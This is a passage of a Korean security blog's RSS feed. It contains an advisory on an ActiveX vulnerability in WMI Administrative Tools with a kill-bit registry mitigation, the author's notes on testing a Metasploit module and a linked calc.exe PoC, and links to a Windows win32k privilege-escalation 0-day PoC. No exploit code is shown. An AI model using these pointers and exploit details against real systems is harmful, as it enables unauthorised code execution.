		&lt;ul class=&quot;tt-sns-service-more&quot; id=&quot;ttSnsServiceMore-&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;
			&lt;li class=&quot;tt-sns-service-me2day&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('me2day', '', '');&quot;&gt;미투데이&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-yozm&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('yozm', '', '');&quot;&gt;요즘&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
	&lt;/div&gt;
	&lt;div class=&quot;tt-sns-clear&quot;&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align:left; padding-top:10px;&quot;&gt;
&lt;iframe src=&quot;http://www.facebook.com/plugins/like.php?href=malwarelab.tistory.com/126&amp;amp;layout=standard&amp;amp;show_faces=true&amp;amp;width=310&amp;amp;action=like&amp;amp;font=tahoma&amp;amp;colorscheme=light&amp;amp;height=65&quot; scrolling=&quot;no&quot; frameborder=&quot;0&quot; style=&quot;border:none; overflow:hidden; width:310px; height:65px;&quot; allowTransparency=&quot;true&quot;&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;fieldset style=&quot;margin:20px 0px 20px 0px;padding:5px;&quot;&gt;&lt;legend&gt;&lt;span&gt;&lt;strong&gt;크리에이티브 커먼즈 라이선스&lt;/strong&gt;&lt;/span&gt;&lt;/legend&gt;&lt;!--Creative Commons License--&gt;&lt;div style=&quot;float: left; width: 88px; margin-top: 3px;&quot;&gt;&lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;&lt;img alt=&quot;Creative Commons License&quot; style=&quot;border-width: 0&quot; src=&quot;http://i.creativecommons.org/l/by-nc-nd/2.0/kr/88x31.png&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;margin-left: 92px; margin-top: 3px; text-align: justify;&quot;&gt;이 저작물은 &lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;크리에이티브 커먼즈 코리아 저작자표시-비영리-변경금지 2.0 대한민국 라이선스&lt;/a&gt;에 따라 이용하실 수 있습니다.
			&lt;!-- Creative Commons License--&gt;
			&lt;!-- &lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
			&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
			&lt;/Work&gt;
			&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;&lt;/License&gt;&lt;/rdf:RDF&gt; --&gt;&lt;/div&gt;&lt;/fieldset&gt;</description>
			<category>0x06 vulnerability</category>
			<category>CreateSizedDIBSECTION</category>
			<category>cve-2010-3970</category>
			<author>demantos</author>
			<guid>http://malwarelab.tistory.com/126</guid>
			<comments>http://malwarelab.tistory.com/entry/Microsoft-Windows-CreateSizedDIBSECTION-Thumbnail-View-Stack-Buffer-Overflow#entry126comment</comments>
			<pubDate>Wed, 05 Jan 2011 10:30:08 +0900</pubDate>
		</item>
		<item>
			<title>Microsoft WMI Administrative Tools WBEMSingleView.ocx ActiveX control vulnerability</title>
			<link>http://malwarelab.tistory.com/entry/Microsoft-WMI-Administrative-Tools-WBEMSingleViewocx-ActiveX-control-vulnerability</link>
			<description>&lt;P&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;STRONG&gt;&lt;SPAN style=&quot;FONT-SIZE: 12pt&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;Overview&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;br /&gt;
&lt;/STRONG&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;The ActiveX control, WBEMSingleView.ocx, that is a part of the &lt;A title=&quot;[http://www.microsoft.com/downloads/en/details.aspx?FamilyID=6430f853-1120-48db-8cc5-f2abdc3ed314]로 이동합니다.&quot; href=&quot;http://www.microsoft.com/downloads/en/details.aspx?FamilyID=6430f853-1120-48db-8cc5-f2abdc3ed314&quot; target=_blank&gt;WMI Administrative Tools&lt;/A&gt; package contains a vulnerability.&lt;/SPAN&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;STRONG&gt;&lt;SPAN style=&quot;FONT-SIZE: 12pt&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;I. Description&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;br /&gt;
&lt;/STRONG&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;The AddContextRef() and ReleaseContext() functions of the WMI Object Viewer control can be passed an object pointer from an attacker that results in arbitrary code execution. An Internet Explorer user with WBEMSingleView.ocx installed can be exploited by visiting a malicious web page.&lt;/SPAN&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;STRONG&gt;&lt;SPAN style=&quot;FONT-SIZE: 12pt&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;II. Impact&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;br /&gt;
&lt;/STRONG&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;An attacker can execute arbitrary code as the user.&lt;/SPAN&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;STRONG&gt;&lt;SPAN style=&quot;FONT-SIZE: 12pt&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;III. Solution&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;br /&gt;
&lt;/STRONG&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;We are currently unaware of a practical solution to this problem.&lt;/SPAN&gt;&lt;br /&gt;
&lt;br /&gt;&lt;STRONG&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;Disable the WMI Object Viewer ActiveX control in Internet Explorer&lt;/SPAN&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/STRONG&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;The vulnerable ActiveX control can be disabled in Internet Explorer by setting the kill bit for the following CLSID:&lt;/SPAN&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN-LEFT: 4em&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;{2745E5F5-D234-11D0-847A-00C04FD7BB08}&lt;/SPAN&gt;&lt;br /&gt;
&lt;/P&gt;
&lt;P&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;More information about how to set the kill bit is available in Microsoft Support Document 240797. Alternatively, the following text can be saved as a .REG file and imported to set the kill bit for this control: &lt;/SPAN&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN-LEFT: 4em&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;Windows Registry Editor Version 5.00&lt;/SPAN&gt;&lt;br /&gt;
&lt;br /&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerActiveX Compatibility{2745E5F5-D234-11D0-847A-00C04FD7BB08}]&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&quot;Compatibility Flags&quot;=dword:00000400&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;[HKEY_LOCAL_MACHINESOFTWAREWow6432NodeMicrosoftInternet ExplorerActiveX Compatibility{2745E5F5-D234-11D0-847A-00C04FD7BB08}]&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&quot;Compatibility Flags&quot;=dword:00000400 &lt;/SPAN&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;Disable ActiveX&lt;/SPAN&gt;&lt;br /&gt;
&lt;/STRONG&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;Disabling ActiveX controls in the Internet Zone (or any zone used by an attacker) appears to prevent exploitation of this and other ActiveX vulnerabilities. Instructions for disabling ActiveX in the Internet Zone can be found in the “Securing Your Web Browser” document.&lt;/SPAN&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;STRONG&gt;&lt;SPAN style=&quot;FONT-SIZE: 12pt&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;Vendor Information&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;br /&gt;
&lt;/STRONG&gt;&lt;br /&gt;
&lt;br /&gt;&lt;STRONG&gt;&lt;SPAN style=&quot;FONT-SIZE: 12pt&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;References&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;br /&gt;
&lt;/STRONG&gt;&lt;A href=&quot;http://www.cert.org/tech_tips/securing_browser/&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;A title=&quot;[http://www.cert.org/tech_tips/securing_browser/]로 이동합니다.&quot; href=&quot;http://www.cert.org/tech_tips/securing_browser/&quot; target=_blank&gt;http://www.cert.org/tech_tips/securing_browser/&lt;/A&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;br /&gt;
&lt;A href=&quot;http://www.microsoft.com/downloads/en/details.aspx?FamilyID=6430f853-1120-48db-8cc5-f2abdc3ed314&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;A title=&quot;[http://www.microsoft.com/downloads/en/details.aspx?FamilyID=6430f853-1120-48db-8cc5-f2abdc3ed314]로 이동합니다.&quot; href=&quot;http://www.microsoft.com/downloads/en/details.aspx?FamilyID=6430f853-1120-48db-8cc5-f2abdc3ed314&quot; target=_blank&gt;http://www.microsoft.com/downloads/en/details.aspx?FamilyID=6430f853-1120-48db-8cc5-f2abdc3ed314&lt;/A&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;br /&gt;
&lt;A href=&quot;http://support.microsoft.com/kb/240797&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;A title=&quot;[http://support.microsoft.com/kb/240797]로 이동합니다.&quot; href=&quot;http://support.microsoft.com/kb/240797&quot; target=_blank&gt;http://support.microsoft.com/kb/240797&lt;/A&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;br /&gt;
&lt;A href=&quot;http://www.wooyun.org/bugs/wooyun-2010-01006&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;A title=&quot;[http://www.wooyun.org/bugs/wooyun-2010-01006]로 이동합니다.&quot; href=&quot;http://www.wooyun.org/bugs/wooyun-2010-01006&quot; target=_blank&gt;http://www.wooyun.org/bugs/wooyun-2010-01006&lt;/A&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;br /&gt;
&lt;A href=&quot;http://secunia.com/advisories/42693&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;A title=&quot;[http://secunia.com/advisories/42693]로 이동합니다.&quot; href=&quot;http://secunia.com/advisories/42693&quot; target=_blank&gt;http://secunia.com/advisories/42693&lt;/A&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;&lt;br /&gt;
&lt;STRONG&gt;&lt;SPAN style=&quot;FONT-SIZE: 12pt&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;Credit&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;br /&gt;
&lt;/STRONG&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;This vulnerability was publicly disclosed on WooYun.org.&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;This document was written by Jared Allar.&lt;/SPAN&gt;&lt;br /&gt;
&lt;br /&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;Other Information&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;Date Public: 2010-12-22 &lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;Date First Published: 2010-12-22 &lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;Date Last Updated: 2010-12-22 &lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;br /&gt;
&amp;nbsp;&lt;br /&gt;
&lt;/P&gt;
&lt;DIV style=&quot;BORDER-BOTTOM: 0pt; BORDER-LEFT: 0pt; WIDTH: 99%; BACKGROUND: url(http://deco.daum-img.net/contents/horizontalrule/line03.gif?rv=1.0.1) repeat-x left 50%; HEIGHT: 15px; BORDER-TOP: 0pt; BORDER-RIGHT: 0pt&quot;&gt;
&lt;HR style=&quot;BORDER-BOTTOM: 0pt; POSITION: relative; BORDER-LEFT: 0pt; BORDER-TOP: 0pt; TOP: -999px; BORDER-RIGHT: 0pt; LEFT: -999px&quot;&gt;
&lt;/DIV&gt;
&lt;P&gt;&lt;br /&gt;
Metasploit에 exploit이 뜨긴 했는데 테스트해 본 결과 잘 안되고 있습니다. &lt;br /&gt;
제가 뭔가 잘못하고 있는거겠죠? 삽질 좀 해야겠군요...-_-;;&lt;br /&gt;
&lt;br /&gt;일단 exploit이 떴으니 분석해보면 좋겠는데 오늘은 크리스마스 이브군요 ;)&lt;br /&gt;
게다가 내일은 마나님 생신이시니 오늘 저녁부터 즐겁게 놀아드려야 해서 주말 동안 분석을 할 수 있을지 미지수입니다.&lt;br /&gt;
&lt;br /&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://cfile8.uf.tistory.com/original/157F42384D143CEA2982AC&quot; rel=&quot;lightbox&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://cfile8.uf.tistory.com/image/157F42384D143CEA2982AC&quot; alt=&quot;&quot; filemime=&quot;image/jpeg&quot; filename=&quot;wmi_metasploit.png&quot; height=&quot;369&quot; width=&quot;710&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;A title=&quot;[http://www.wooyun.org/bugs/wooyun-2010-01006]로 이동합니다.&quot; href=&quot;http://www.wooyun.org/bugs/wooyun-2010-01006&quot; target=_blank&gt;http://www.wooyun.org/bugs/wooyun-2010-01006&lt;/A&gt;&amp;nbsp;에 있는 계산기(calc.exe)를 띄우는 PoC 코드는 정상적으로 동작하고 있습니다. &lt;br /&gt;
&lt;br /&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://cfile27.uf.tistory.com/original/1262C2344D144AD91A881E&quot; rel=&quot;lightbox&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://cfile27.uf.tistory.com/image/1262C2344D144AD91A881E&quot; alt=&quot;&quot; filemime=&quot;image/jpeg&quot; filename=&quot;wmi_html.png&quot; height=&quot;407&quot; width=&quot;656&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
metasploit 코드 확인해봐야겠습니다.&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;/SPAN&gt;&lt;/A&gt;&lt;/SPAN&gt;&lt;/P&gt;&lt;div class=&quot;entry-ccl&quot; style=&quot;clear: both; text-align: right; margin-bottom: 10px&quot;&gt;
	&lt;img id=&quot;ccl-icon-125-0&quot; class=&quot;entry-ccl-by&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black01.png&quot; alt=&quot;저작자 표시&quot;/&gt;
	&lt;img id=&quot;ccl-icon-125-1&quot; class=&quot;entry-ccl-nc&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black02.png&quot; alt=&quot;비영리&quot;/&gt;
	&lt;img id=&quot;ccl-icon-125-2&quot; class=&quot;entry-ccl-nd&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black03.png&quot; alt=&quot;변경 금지&quot;/&gt;
	&lt;!--
	&lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
		&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
		&lt;/Work&gt;
		&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;
			&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;
		&lt;/License&gt;
	&lt;/rdf:RDF&gt;
	--&gt;
&lt;/div&gt;
&lt;div class=&quot;tt-plugin tt-share-entry-with-sns tt-sns-icon-alignment-right tt-sns-icon-size-big&quot;&gt;
	&lt;div class=&quot;tt-sns-wrap&quot; id=&quot;ttSnsWrap-&quot;&gt;
		&lt;ul class=&quot;tt-sns-service-default&quot;&gt;
			&lt;li class=&quot;tt-sns-service-mypeople&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('mypeople', '', '');&quot;&gt;마이피플&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-twitter&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('twitter', '', '');&quot;&gt;트위터&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-facebook&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('facebook', '', '');&quot;&gt;페이스북&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-other&quot;&gt;&lt;a href=&quot;javascript:;&quot; onmouseover=&quot;ShareEntryWithSNS.showLayer(event, '');&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;더보기&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
		&lt;ul class=&quot;tt-sns-service-more&quot; id=&quot;ttSnsServiceMore-&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;
			&lt;li class=&quot;tt-sns-service-me2day&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('me2day', '', '');&quot;&gt;미투데이&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-yozm&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('yozm', '', '');&quot;&gt;요즘&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
	&lt;/div&gt;
	&lt;div class=&quot;tt-sns-clear&quot;&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align:left; padding-top:10px;&quot;&gt;
&lt;iframe src=&quot;http://www.facebook.com/plugins/like.php?href=malwarelab.tistory.com/125&amp;amp;layout=standard&amp;amp;show_faces=true&amp;amp;width=310&amp;amp;action=like&amp;amp;font=tahoma&amp;amp;colorscheme=light&amp;amp;height=65&quot; scrolling=&quot;no&quot; frameborder=&quot;0&quot; style=&quot;border:none; overflow:hidden; width:310px; height:65px;&quot; allowTransparency=&quot;true&quot;&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;fieldset style=&quot;margin:20px 0px 20px 0px;padding:5px;&quot;&gt;&lt;legend&gt;&lt;span&gt;&lt;strong&gt;크리에이티브 커먼즈 라이선스&lt;/strong&gt;&lt;/span&gt;&lt;/legend&gt;&lt;!--Creative Commons License--&gt;&lt;div style=&quot;float: left; width: 88px; margin-top: 3px;&quot;&gt;&lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;&lt;img alt=&quot;Creative Commons License&quot; style=&quot;border-width: 0&quot; src=&quot;http://i.creativecommons.org/l/by-nc-nd/2.0/kr/88x31.png&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;margin-left: 92px; margin-top: 3px; text-align: justify;&quot;&gt;이 저작물은 &lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;크리에이티브 커먼즈 코리아 저작자표시-비영리-변경금지 2.0 대한민국 라이선스&lt;/a&gt;에 따라 이용하실 수 있습니다.
			&lt;!-- Creative Commons License--&gt;
			&lt;!-- &lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
			&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
			&lt;/Work&gt;
			&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;&lt;/License&gt;&lt;/rdf:RDF&gt; --&gt;&lt;/div&gt;&lt;/fieldset&gt;</description>
			<category>0x06 vulnerability</category>
			<category>WBEMSingleView.ocx</category>
			<category>WMI Admin Tool</category>
			<category>wmi_admintools</category>
			<author>demantos</author>
			<guid>http://malwarelab.tistory.com/125</guid>
			<comments>http://malwarelab.tistory.com/entry/Microsoft-WMI-Administrative-Tools-WBEMSingleViewocx-ActiveX-control-vulnerability#entry125comment</comments>
			<pubDate>Fri, 24 Dec 2010 15:26:50 +0900</pubDate>
		</item>
		<item>
			<title>Privilege escalation 0-day in almost all Windows versions</title>
			<link>http://malwarelab.tistory.com/entry/Privilege-escalation-0-day-in-almost-all-Windows-versions</link>
			<description>&lt;br /&gt;
&lt;br /&gt;&lt;A href=&quot;http://isc.sans.edu/diary.html?storyid=9988&amp;amp;rss&quot;&gt;http://isc.sans.edu/diary.html?storyid=9988&amp;amp;rss&lt;/A&gt;&lt;br /&gt;
&lt;A href=&quot;http://moonslab.com/1195&quot;&gt;http://moonslab.com/1195&lt;/A&gt;&lt;br /&gt;
&lt;A href=&quot;http://packetstormsecurity.org/files/96091&quot;&gt;http://packetstormsecurity.org/files/96091&lt;/A&gt;&lt;br /&gt;
&lt;A href=&quot;http://pastebin.com/ReCGfJSf&quot;&gt;http://pastebin.com/ReCGfJSf&lt;/A&gt;&lt;br /&gt;
&lt;br /&gt;win32k.sys의 버퍼 오버플로우 발생시 UAC를 우회할 수 있는 취약점이라고 합니다.&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;div class=&quot;imageblock&quot; style=&quot;display:inline;&quot;&gt;&lt;a href=&quot;http://cfile10.uf.tistory.com/original/20540A044CEDC31B06269F&quot; rel=&quot;lightbox&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://cfile10.uf.tistory.com/image/20540A044CEDC31B06269F&quot; alt=&quot;&quot; filemime=&quot;image/jpeg&quot; filename=&quot;poc.png&quot; height=&quot;182&quot; width=&quot;451&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;STRONG&gt;시연 동영상 (thanks for&amp;nbsp;&lt;/STRONG&gt;&lt;A title=&quot;[http://twitter.com/#!/6l4ck3y3]로 이동합니다.&quot; href=&quot;http://twitter.com/#!/6l4ck3y3&quot; target=_blank&gt;&lt;STRONG&gt;6l4ck3y3&lt;/STRONG&gt;&lt;/A&gt;&lt;STRONG&gt;)&lt;br /&gt;
&lt;/STRONG&gt;&lt;br /&gt;
&lt;embed width=&quot;700&quot; height=&quot;550&quot; src=&quot;http://hisjournal.net/video/uacpoc.swf&quot; quality=&quot;high&quot; allowScriptAccess=&quot;always&quot; type=&quot;application/x-shockwave-flash&quot; pluginspage=&quot;http://www.macromedia.com/go/getflashplayer&quot;/&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;entry-ccl&quot; style=&quot;clear: both; text-align: right; margin-bottom: 10px&quot;&gt;
	&lt;img id=&quot;ccl-icon-124-0&quot; class=&quot;entry-ccl-by&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black01.png&quot; alt=&quot;저작자 표시&quot;/&gt;
	&lt;img id=&quot;ccl-icon-124-1&quot; class=&quot;entry-ccl-nc&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black02.png&quot; alt=&quot;비영리&quot;/&gt;
	&lt;img id=&quot;ccl-icon-124-2&quot; class=&quot;entry-ccl-nd&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black03.png&quot; alt=&quot;변경 금지&quot;/&gt;
	&lt;!--
	&lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
		&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
		&lt;/Work&gt;
		&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;
			&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;
		&lt;/License&gt;
	&lt;/rdf:RDF&gt;
	--&gt;
&lt;/div&gt;
&lt;div class=&quot;tt-plugin tt-share-entry-with-sns tt-sns-icon-alignment-right tt-sns-icon-size-big&quot;&gt;
	&lt;div class=&quot;tt-sns-wrap&quot; id=&quot;ttSnsWrap-&quot;&gt;
		&lt;ul class=&quot;tt-sns-service-default&quot;&gt;
			&lt;li class=&quot;tt-sns-service-mypeople&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('mypeople', '', '');&quot;&gt;마이피플&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-twitter&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('twitter', '', '');&quot;&gt;트위터&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-facebook&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('facebook', '', '');&quot;&gt;페이스북&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-other&quot;&gt;&lt;a href=&quot;javascript:;&quot; onmouseover=&quot;ShareEntryWithSNS.showLayer(event, '');&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;더보기&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
